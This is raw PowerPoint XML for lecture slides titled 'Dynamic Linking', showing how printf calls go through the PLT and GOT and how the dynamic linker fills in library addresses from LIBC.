              <a:t>&gt;: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>jmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t> GOT[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>] </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Lucida Console"/>
              <a:cs typeface="Lucida Console"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4029126" y="2835446"/>
            <a:ext cx="4423279" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>GOT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>&gt;: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>dynamic_linker_addr</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Lucida Console"/>
              <a:cs typeface="Lucida Console"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="11" name="Group 10"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="87589" y="2111771"/>
            <a:ext cx="2822124" cy="364981"/>
            <a:chOff x="87589" y="2111771"/>
            <a:chExt cx="2822124" cy="364981"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="Rectangle 7"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="457200" y="2111771"/>
              <a:ext cx="2452513" cy="364981"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent6">
                <a:lumMod val="75000"/>
                <a:alpha val="2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ight Arrow 1"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="87589" y="2123416"/>
              <a:ext cx="291966" cy="306585"/>
            </a:xfrm>
            <a:prstGeom prst="rightArrow">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875897" y="2145318"/>
            <a:ext cx="3051043" cy="2426682"/>
            <a:chOff x="875897" y="2145318"/>
            <a:chExt cx="3051043" cy="2426682"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="Right Arrow 11"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="21349956">
              <a:off x="3065642" y="2145318"/>
              <a:ext cx="861298" cy="132167"/>
            </a:xfrm>
            <a:prstGeom prst="rightArrow">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875897" y="3527621"/>
              <a:ext cx="2749131" cy="1044379"/>
            </a:xfrm>
            <a:prstGeom prst="wedgeRoundRectCallout">
              <a:avLst>
                <a:gd name="adj1" fmla="val 79183"/>
                <a:gd name="adj2" fmla="val -170700"/>
                <a:gd name="adj3" fmla="val 16667"/>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smtClean="0"/>
                <a:t>Transfer control to PLT entry of </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
                <a:t>printf</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="5469717"/>
            <a:ext cx="4423279" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>dynamic_printf_addr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>&gt;:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>...</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Lucida Console"/>
              <a:cs typeface="Lucida Console"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Rectangle 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="5036743"/>
            <a:ext cx="4423279" cy="43297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smtClean="0"/>
              <a:t>LIBC</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="19" name="Group 18"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5883108" y="2223454"/>
            <a:ext cx="3011146" cy="3572452"/>
            <a:chOff x="5883108" y="2223454"/>
            <a:chExt cx="3011146" cy="3572452"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="Hexagon 15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5883108" y="4394377"/>
              <a:ext cx="2029161" cy="1401529"/>
            </a:xfrm>
            <a:prstGeom prst="hexagon">
              <a:avLst>
                <a:gd name="adj" fmla="val 14584"/>
                <a:gd name="vf" fmla="val 115470"/>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Linker</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="3600" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="18" name="Curved Left Arrow 17"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="533263">
              <a:off x="8210021" y="2223454"/>
              <a:ext cx="684233" cy="3084516"/>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21" name="Rectangle 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5430560" y="3363561"/>
            <a:ext cx="2773676" cy="364981"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent6">
              <a:lumMod val="75000"/>
              <a:alpha val="2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ight Arrow 21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="6682638" y="4009597"/>
            <a:ext cx="363138" cy="169151"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="558ED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B747839D-A323-47F3-909F-548499399628}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>47</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12940291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3" presetClass="exit" presetSubtype="10" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="blinds(horizontal)">
                                      <p:cBhvr>
                                        <p:cTn id="16" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="20"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="17" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="20"/>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990000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Dynamic Linking</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="990000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1819783"/>
            <a:ext cx="2978050" cy="1477328"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>(“hello ”);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>(“world\n”);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>...</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Lucida Console"/>
              <a:cs typeface="Lucida Console"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4029126" y="1819783"/>
            <a:ext cx="4423279" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>printf@plt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>&gt;: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>jmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t> GOT[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>] </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Lucida Console"/>
              <a:cs typeface="Lucida Console"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4029126" y="2835446"/>
            <a:ext cx="4423279" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>GOT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>&gt;: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>dynamic_printf_addr</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Lucida Console"/>
              <a:cs typeface="Lucida Console"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="11" name="Group 10"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="87589" y="2111771"/>
            <a:ext cx="2822124" cy="364981"/>
            <a:chOff x="87589" y="2111771"/>
            <a:chExt cx="2822124" cy="364981"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="Rectangle 7"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="457200" y="2111771"/>
              <a:ext cx="2452513" cy="364981"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent6">
                <a:lumMod val="75000"/>
                <a:alpha val="2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ight Arrow 1"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="87589" y="2123416"/>
              <a:ext cx="291966" cy="306585"/>
            </a:xfrm>
            <a:prstGeom prst="rightArrow">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TextBox 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="5469717"/>
            <a:ext cx="4423279" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>dynamic_printf_addr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>&gt;:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>...</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Lucida Console"/>
              <a:cs typeface="Lucida Console"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Rectangle 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="5036743"/>
            <a:ext cx="4423279" cy="43297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smtClean="0"/>
              <a:t>LIBC</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Hexagon 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5883108" y="4394377"/>
            <a:ext cx="2029161" cy="1401529"/>
          </a:xfrm>
          <a:prstGeom prst="hexagon">
            <a:avLst>
              <a:gd name="adj" fmla="val 14584"/>
              <a:gd name="vf" fmla="val 115470"/>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Linker</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Rectangle 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5430560" y="3363561"/>
            <a:ext cx="2773676" cy="364981"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent6">
              <a:lumMod val="75000"/>
              <a:alpha val="2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ular Callout 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="3758777"/>
            <a:ext cx="3897744" cy="1113726"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 90692"/>
              <a:gd name="adj2" fmla="val -46840"/>
              <a:gd name="adj3" fmla="val 16667"/>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smtClean="0"/>
              <a:t>Linker fills in the actual addresses of library functions</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Slide Number Placeholder 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B747839D-A323-47F3-909F-548499399628}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>48</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="844662887"/>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990000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Dynamic Linking</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="990000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1819783"/>
            <a:ext cx="2978050" cy="1477328"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>(“hello ”);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>(“world\n”);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>...</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Lucida Console"/>
              <a:cs typeface="Lucida Console"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4029126" y="1819783"/>
            <a:ext cx="4423279" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>printf@plt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>&gt;: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>jmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t> GOT[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>] </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
